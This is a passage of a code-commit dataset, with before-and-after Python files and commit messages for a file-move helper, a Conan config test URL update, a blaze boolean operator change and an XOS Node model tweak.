if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))Add in overwrite output filefrom os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) | <commit_before>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and not isfile(out_file):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file)))<commit_msg>Add in overwrite output file<commit_after>from os import chmod, unlink, stat, makedirs
from os.path import isfile, split, exists
from shutil import copyfile
def move_verify_delete(in_file, out_file, overwrite=False):
'''
Moves in_file to out_file, verifies that the filesizes are the same and
then does a chmod 666
'''
if not exists(split(out_file)[0]):
makedirs(split(out_file)[0])
if isfile(in_file) and (overwrite or not isfile(out_file)):
orig_file_size = stat(in_file).st_size
copyfile(in_file, out_file)
new_file_size = stat(out_file).st_size
if new_file_size != orig_file_size:
raise Exception('File Transfer Error! %s:%d -> %s:%d'%(in_file, orig_file_size, out_file, new_file_size))
unlink(in_file)
#chmod(out_file, 666)
else:
raise Exception('File Transfer Error! %s EXISTS %s %s EXISTS %s'%(in_file,
isfile(in_file),
out_file,
isfile(out_file))) |
4d55b1bde81c9f426da97f474d759ba8b0a94650 | cpt/test/unit/config_test.py | cpt/test/unit/config_test.py | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| Update Bincrafters config url for tests | Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com>
| Python | mit | conan-io/conan-package-tools | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com> | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| <commit_before>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
<commit_msg>Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com><commit_after> | import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
| <commit_before>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/conan-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/conan-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
<commit_msg>Update Bincrafters config url for tests
Signed-off-by: Uilian Ries <d4bad57018205bdda203549c36d3feb0bfe416a7@gmail.com><commit_after>import unittest
from conans.errors import ConanException
from cpt.config import ConfigManager
from cpt.printer import Printer
from cpt.test.integration.base import BaseTest
from cpt.test.unit.packager_test import MockConanAPI
class RemotesTest(unittest.TestCase):
def setUp(self):
self.conan_api = MockConanAPI()
def test_valid_config(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git')
def test_valid_config_with_args(self):
manager = ConfigManager(self.conan_api, Printer())
manager.install('https://github.com/bincrafters/bincrafters-config.git', '-b master')
class RemotesTestRealApi(BaseTest):
def test_valid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
manager.install("https://github.com/bincrafters/bincrafters-config.git", "-b master")
profiles = self.api.profile_list()
self.assertGreater(len(profiles), 3)
def test_invalid_config(self):
manager = ConfigManager(self.api, Printer())
profiles = self.api.profile_list()
self.assertEquals(len(profiles), 0)
try:
manager.install("https://github.com/")
self.fail("Could not accept wrong URL")
except ConanException:
pass
|
f55f965c4102e2d7230ace39a0eecdaf585538ea | blaze/expr/scalar/boolean.py | blaze/expr/scalar/boolean.py | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| Use __invert__ instead of __not__ | Use __invert__ instead of __not__
| Python | bsd-3-clause | LiaoPan/blaze,caseyclements/blaze,cpcloud/blaze,cowlicks/blaze,caseyclements/blaze,jdmcbr/blaze,dwillmer/blaze,nkhuyu/blaze,scls19fr/blaze,mrocklin/blaze,cowlicks/blaze,dwillmer/blaze,cpcloud/blaze,xlhtc007/blaze,jcrist/blaze,maxalbert/blaze,jdmcbr/blaze,ChinaQuants/blaze,ContinuumIO/blaze,maxalbert/blaze,mrocklin/blaze,nkhuyu/blaze,jcrist/blaze,LiaoPan/blaze,xlhtc007/blaze,ChinaQuants/blaze,scls19fr/blaze,ContinuumIO/blaze,alexmojaki/blaze,alexmojaki/blaze | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
Use __invert__ instead of __not__ | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| <commit_before>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
<commit_msg>Use __invert__ instead of __not__<commit_after> | import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
Use __invert__ instead of __not__import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
| <commit_before>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __not__(self):
return Not(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
<commit_msg>Use __invert__ instead of __not__<commit_after>import operator
from datashape import dshape
from .core import Scalar, BinOp, UnaryOp
class BooleanInterface(Scalar):
def __invert__(self):
return Invert(self)
def __and__(self, other):
return And(self, other)
def __or__(self, other):
return Or(self, other)
class Boolean(BooleanInterface):
@property
def dshape(self):
return dshape('bool')
class Relational(BinOp, Boolean):
pass
class Eq(Relational):
symbol = '=='
op = operator.eq
class Ne(Relational):
symbol = '!='
op = operator.ne
class Ge(Relational):
symbol = '>='
op = operator.ge
class Le(Relational):
symbol = '<='
op = operator.le
class Gt(Relational):
symbol = '>'
op = operator.gt
class Lt(Relational):
symbol = '<'
op = operator.lt
class And(BinOp, Boolean):
symbol = '&'
op = operator.and_
class Or(BinOp, Boolean):
symbol = '|'
op = operator.or_
class Not(UnaryOp, Boolean):
symbol = '~'
op = operator.not_
Invert = Not
BitAnd = And
BitOr = Or
|
367d5d6196c3c21e2d1353b258801e6d5e14e602 | xos/core/models/node.py | xos/core/models/node.py | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| Make Node syncs a noop | Make Node syncs a noop
| Python | apache-2.0 | jermowery/xos,cboling/xos,cboling/xos,cboling/xos,jermowery/xos,cboling/xos,xmaruto/mcord,jermowery/xos,xmaruto/mcord,xmaruto/mcord,cboling/xos,jermowery/xos,xmaruto/mcord | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
Make Node syncs a noop | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| <commit_before>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
<commit_msg>Make Node syncs a noop<commit_after> | import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
Make Node syncs a noopimport os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
def __init__(self, *args, **kwargs):
super(Node, self).__init__(*args, **kwargs)
self.no_sync=True
def save(self, *args, **kwds):
if self.site is None and self.site_deployment is not None:
self.site = self.site_deployment.site
super(Node, self).save(*args, **kwds)
def can_update(self, user):
return user.can_update_site(self.site, allow=['tech'])
| <commit_before>import os
from django.db import models
from core.models import PlCoreBase
from core.models.plcorebase import StrippedCharField
from core.models import Site, SiteDeployment, SitePrivilege
from core.models import Tag
from django.contrib.contenttypes import generic
# Create your models here.
class Node(PlCoreBase):
name = StrippedCharField(max_length=200, unique=True, help_text="Name of the Node")
site_deployment = models.ForeignKey(SiteDeployment, related_name='nodes')
site = models.ForeignKey(Site, null=True, blank=True, related_name='nodes')
tags = generic.GenericRelation(Tag)
def __unicode__(self): return u'%s' % (self.name)
